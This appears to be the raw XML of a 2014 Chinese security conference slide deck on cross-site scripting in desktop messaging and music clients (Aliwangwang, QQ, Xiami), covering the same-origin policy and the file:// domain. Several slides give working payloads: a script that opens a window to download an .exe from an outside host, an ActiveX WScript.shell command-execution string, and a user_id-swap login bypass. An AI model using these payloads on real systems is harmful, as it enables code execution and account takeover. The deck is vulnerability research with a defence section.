          <p:cNvPr id="161" name="阿里旺旺客户端-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5865" y="3823975"/>
            <a:ext cx="5652085" cy="3858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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Shape 164"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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952500" y="2609850"/>
            <a:ext cx="5419725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Mac OS版本阿里旺旺则会直接解析执行代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="阿里旺旺客户端-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91955" y="3766670"/>
            <a:ext cx="5245160" cy="3972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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Shape 169"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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嵌入iframe标签弹出浏览器进行下载：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>&lt;script&gt;window.open (‘http://www.hackersoul.com/demo.exe','newwindow','height=1000,width=1000,top=0,left=0,toolbar=no,menubar=no,scrollbars=no, resizable=no,location=no, status=no’);&lt;/script&gt;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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Shape 173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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952500" y="2609850"/>
            <a:ext cx="5419725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Mac OS版本的企业QQ联系方式处未过滤长度限制和特殊字符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175" name="0065D2B7-5936-47D1-926E-64D5A7EFFC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04155" y="3551322"/>
            <a:ext cx="5551149" cy="44035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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Shape 178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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None/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>一、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>QQ 发起会话时会访问用户名片,发起 http 请求,如:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://id.b.qq.com/hrtx/clientcall/clientInfo/newAllInOne?objective_qquin=2333350888&amp;orignal_qquin=123230273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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Shape 182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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None/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>二、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>QQ 客户端把这个 http 请求页面保存到本地 html 文件:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>C:\Users\AppData\Roaming\Tencent\QQ\Misc\com.tencent. hrtx\HRTXSideBarFrame_2355350877.html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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Shape 186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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xfrm>
            <a:off x="877515" y="3168650"/>
            <a:ext cx="11249770" cy="1752104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3528" b="1"/>
              <a:t>三、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3528"/>
              <a:t>QQ 客户端直接调用 file://协议运行这个 html 文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="188" name="3B9C433E-1CB6-430E-B1D7-8276F8EF02C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21949" y="4332795"/>
            <a:ext cx="8760902" cy="40090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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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xfrm>
            <a:off x="839415" y="3181350"/>
            <a:ext cx="11325969" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2628" b="1"/>
              <a:t>四、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2628"/>
              <a:t>使用系统控件执行系统命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2628"/>
              <a:t>&lt;script&gt;new ActiveXObject("WScript.shell").Run('calc.exe',1,true);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="193" name="BB6118E7-A920-4990-9BA9-C45832CFD69E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72861" y="4848944"/>
            <a:ext cx="5259079" cy="44506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270000" y="4207827"/>
            <a:ext cx="10464800" cy="804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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500"/>
              <a:t>一切输入都是有害的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0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>混合通信所导致的安全隐患</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tip 3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xfrm>
            <a:off x="927099" y="2774949"/>
            <a:ext cx="6578601" cy="5930901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="345722" indent="-345722"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>不同平台下的客户端接口策略存在差异。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="197" name="26soul.xlarge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10135" y="4588220"/>
            <a:ext cx="3950331" cy="23043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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Shape 200"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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虾米音乐登录成功后会跳转：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.xiami.com/accounts/pcsuccess?user_id=12345678&amp;type=XMac</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>尝试修改user_id为其他用户id后未能登录成功</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>但虾米音乐Mac客户端则会获取标识type=XMac登录标识，未做判断将修改后的URL标识进行登录，导致可登录任意用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="1485900"/>
            <a:ext cx="23749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— Pw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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tips案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="51B20EAE-C74D-4AA2-837F-3928A469B38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76784" y="2925160"/>
            <a:ext cx="9051232" cy="68375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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="1993900"/>
            <a:ext cx="11099800" cy="5765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3600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6200" b="1"/>
              <a:t>···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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>防御策略</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Shape 209"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="2819400"/>
            <a:ext cx="11099800" cy="5765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3600"/>
          </a:p>
          <a:p>
            <a:pPr marL="635000" lvl="0" indent="-635000">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>多边界数据处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635000" lvl="0" indent="-635000">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>跨平台开发沟通</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635000" lvl="0" indent="-635000">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>完整的安全框架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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Shape 212"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="2819400"/>
            <a:ext cx="11099800" cy="5765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3600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>攻防是个永久的话题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End.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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHY?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为什么是客户端？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500"/>
              <a:t>安全研究人员更多的把跨站的漏洞挖掘放在网站上，其实客户端也是可以的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>此处“跨”的含义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493888" lvl="0" indent="-493888">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>传统的跨站脚本攻击（XSS）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493888" lvl="0" indent="-493888">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>跨平台客户端的安全隐患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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>同源策略（SOP）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952499" y="2070100"/>
            <a:ext cx="11099801" cy="6870849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None/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" b="1"/>
              <a:t>浏览器安全核心基础：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>同源策略（Same-Origin Policy）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>http://www.w3.org/Security/wiki/Same_Origin_Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>源(origin)指使用域名、协议、端口。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="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26659" y="3537694"/>
            <a:ext cx="3545307" cy="1208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45006" y="7290961"/>
            <a:ext cx="8314788" cy="24626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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP域 / File域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952500" y="2235353"/>
            <a:ext cx="11099800" cy="6273801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3168" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3168" b="1" dirty="0"/>
              <a:t>HTTP域：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2464" dirty="0"/>
              <a:t>弹弹框、盗个Cookie、蠕虫、…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3168" b="1" dirty="0"/>
              <a:t>File域：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2464" dirty="0"/>
              <a:t>本地文件域，他没有一个明显的主机名与之关联，浏览器也就不能按照正常的方式来进行同源比较。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2464" dirty="0"/>
              <a:t>不少客户端使用File域加载资源，使攻击者可以拥有较大的权限，执行危险操作。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952500" y="37973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pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500"/>
              <a:t>历史上的案例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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>腾讯QQ群XSS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群资料名称调用WEB接口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>修改群名为Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>查看群资料触发跨站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="腾讯QQ群XSS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18300" y="3266791"/>
            <a:ext cx="5334000" cy="4947218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9626600" y="1485900"/>
            <a:ext cx="23749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— Evi1m0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1501</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>172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White</vt:lpstr>
      <vt:lpstr>去年跨过的客户端</vt:lpstr>
      <vt:lpstr>About Me</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>WHY?</vt:lpstr>
      <vt:lpstr>同源策略（SOP）</vt:lpstr>
      <vt:lpstr>HTTP域 / File域</vt:lpstr>
      <vt:lpstr>历史上的案例</vt:lpstr>
      <vt:lpstr>腾讯QQ群XSS</vt:lpstr>
      <vt:lpstr>阿里旺旺客户端XSS</vt:lpstr>
      <vt:lpstr>阿里旺旺客户端XSS</vt:lpstr>
      <vt:lpstr>阿里旺旺客户端XSS</vt:lpstr>
      <vt:lpstr>腾讯客户端XSS</vt:lpstr>
      <vt:lpstr>ICQ客户端XSS</vt:lpstr>
      <vt:lpstr>微信红包XSS</vt:lpstr>
      <vt:lpstr>Twitter客户端TweetDeck XSS</vt:lpstr>
      <vt:lpstr>新浪微博IOS客户端XSS</vt:lpstr>
      <vt:lpstr>不同平台下的客户端“特性”</vt:lpstr>
      <vt:lpstr>Windows</vt:lpstr>
      <vt:lpstr>Mac OS</vt:lpstr>
      <vt:lpstr>IOS &amp; Android</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>混合通信所导致的安全隐患 WSL Tip 1</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>混合通信所导致的安全隐患 WSL Tip 2</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>混合通信所导致的安全隐患 WSL Tip 3</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>防御策略</vt:lpstr>
      <vt:lpstr>总结</vt:lpstr>
      <vt:lpstr>End.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去年跨过的客户端</dc:title>
  <cp:lastModifiedBy>test test</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-08-21T02:07:33Z</dcterms:modified>
</cp:coreProperties>
</file>